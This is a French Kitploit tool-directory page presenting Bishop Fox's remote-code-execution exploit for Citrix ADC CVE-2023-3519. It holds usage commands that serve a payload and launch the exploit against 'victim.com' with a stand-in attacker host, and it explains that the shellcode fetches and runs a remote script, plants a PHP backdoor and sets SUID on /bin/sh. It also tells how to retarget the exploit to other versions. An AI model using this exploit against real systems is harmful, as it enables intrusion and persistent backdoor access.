Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-3519 — Exploit RCE pour CVE-2023-3519 | Kitploit
Outils/GitHubGitHub/bishopfox/cve-2023-3519
Analyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubbishopfox/cve-2023-3519

CVE-2023-3519

Exploit RCE pour CVE-2023-3519

Voir le dépôt
22843il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Citrix ADC RCE CVE-2023-3519

Cet exploit utilise des adresses et du shellcode pour Citrix VPX 13.1-48.47. Pour l'article complet, cliquez ici.

Utilisation

NASM est requis pour construire le shellcode.

root@kitploit:~
$ sudo apt install nasm

Le shellcode inclus télécharge et exécute un script shell depuis un serveur http(s) distant. Le script prend 3 arguments : l'hôte cible, le port cible et l'URL d'une charge utile de script shell. Un exemple de charge utile qui exécute id et uname -a avant de se nettoyer est inclus dans ce dépôt.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

L'URL doit être suffisamment courte pour tenir dans le tampon du shellcode, et vous obtiendrez un avertissement si elle est trop longue.

Artefacts du shellcode

Le shellcode créera une porte dérobée PHP dans /var/netscaler/logon/a.php et définira le bit SUID sur /bin/sh. La charge utile sh incluse montre un exemple de nettoyage automatique de ces artefacts. Notez également que le shellcode ne ferme pas ses descripteurs de fichiers, donc une exploitation répétée excessive peut entraîner une épuisement des ressources.

Adaptation à d'autres versions

Pour les cibles Citrix basées sur FreeBSD, vous devriez seulement avoir besoin de trouver 3 valeurs : le décalage du pointeur de retour sauvegardé, un gadget ROP jmp rsp (ou quelque chose d'équivalent, comme push rsp; ret;), et l'adresse vers laquelle sauter pour éviter un plantage. Ces paramètres sont tous codés en dur près du haut de cve-2023-3519.py. Pour certaines versions, vous pourriez aussi avoir besoin de trouver une quatrième valeur pour corriger la valeur RBP, car le compilateur génère des chargements relatifs à RBP au lieu d'utiliser des instructions POP pour restaurer les registres sauvegardés.

Télécharger l’outil